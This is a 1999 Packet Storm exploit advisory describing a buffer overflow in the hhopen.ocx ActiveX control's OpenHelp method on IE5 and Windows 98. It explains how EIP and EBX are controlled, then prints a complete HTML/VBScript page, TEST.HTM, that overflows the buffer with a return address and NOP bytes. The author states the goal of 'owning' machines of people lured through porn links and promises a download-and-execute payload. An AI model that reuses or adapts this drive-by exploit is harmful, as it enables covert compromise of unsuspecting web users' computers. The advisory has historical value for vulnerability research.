hhopen.txt

1999-12-16T00:00:00
ID PACKETSTORM:11131
Type packetstorm
Reporter DaCure
Modified 1999-12-16T00:00:00

Description

                                        
                                            `XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
  
HHOPEN.OCX Buffer Overflow  
  
Discovered by DaCure <DaCure@bigfoot.com> of RaZa-MeXiCaNa Hackers Team  
  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
  
  
  
The Problem  
-----------  
  
While playing around with VB6 and some ActiveX controls, I discovered a   
buffer overflow  
in the following function:  
  
Hhopen1.OpenHelp(HelpFile as String, HelpSection as String) as Long  
  
This function is included in the "hhopen OLE Control Module" (hhopen.ocx).  
  
So we fill the buffer with a larger string:  
  
a =   
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
Hhopen1.OpenHelp(a, "whatever")  
  
This would overwrite the return address and make EIP point to 0x41414141   
(the last 4 "A"s).  
Of course nothing is loaded there, instant page fault.  
  
Now, we have good posibilities here for writting an exploit:  
  
- We can overwrite the return address  
- We have a large buffer to put code  
- We have even more buffer space to put code (if we use HelpSection as an   
extension)  
  
I found that EBX is the only register that points somewhere into the string   
(in fact  
it points to the beginning of it... great!).  
  
So we just need to find a "call ebx" and our code will be executed!  
  
  
Test Exploit  
------------  
  
  
The followin is just a test exploit. I dindn't have the time to write   
somethin but I'll do  
something in the next release (download and execute a file, execute a local   
file, etc.)...  
just imagine the fun of owning the machine of those hornys boys that visit   
every damn porn  
link you give them!  
  
  
This is for IE5 with 98. It may work with others too. Tell me what you find.  
  
  
---- TEST.HTM - CUT HERE ----  
  
<html>  
<head>  
<title>HHOPEN.OCX IE5 Exploit</title>  
</head>  
  
<body>  
  
<h1><font face="Arial" color="#FF0000">HHOPEN.OCX IE5 Exploit <release   
1></font>  
</h1>  
  
<p><b><font color="#0000FF"><font face="Arial">by DaCure   
<</font></font><a href="mailto:DaCure@bigfoot.com"><font face="Arial"   
color="#FF0000">DaCure@bigfoot.com</font></a><font face="Arial"   
color="#0000FF">>  
of </font><a href="http://www.raza-mexicana.org"><font face="Arial"   
color="#FF0000">RaZa-MeXiCaNa  
Hackers Team</font></a></b>  
</p>  
  
<p>   
</p>  
  
<p><font face="Arial">Tested with<b> IE5 5.00.2614.3500</b> on   
<b>W98</b>.</font>  
</p>  
  
<p><font face="Arial">May work with other versions as well.</font>  
</p>  
  
<p><font face="Arial">This will do nothing but jump to the start of the   
buffer  
(our code) wich does nothing (you have to code your own exploit) until it  
crashes.</font>  
</p>  
  
<p><font face="Arial">I dind't have the time to code something so the next  
release I'll put something for sure (download and execute a program, execute   
a  
local file, etc.).</font>  
</p>  
  
<p><font face="Arial">We have almost unlimited posibilities with this! If   
you  
combine this with other bugs... guess what? even more posibilities.</font>  
</p>  
  
  
<p><font face="Arial">All kinds of fun owning machines!</font>  
</p>  
  
<p>  
<object classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233" id="Hhopen1"   
width="10" height="10">  
<param name="_Version" value="65536">  
<param name="_ExtentX" value="2646">  
<param name="_ExtentY" value="1323">  
<param name="_StockProps" value="0">  
</object>  
</p>  
  
<script language="VbScript">  
  
a =   
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
a =   
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
a = a + Chr(240) + Chr(103) + Chr(233) + Chr(118)  
b = String(10, Chr(&H90))  
c = hhopen1.openhelp(a, b)  
  
</script>  
</body>  
</html>  
  
  
---- TEST.HTM - CUT HERE ----  
  
  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
  
  
The End.  
  
  
"The most inspiring things for your work are those things you realy like and   
love" --DaCure  
  
  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
  
  
  
`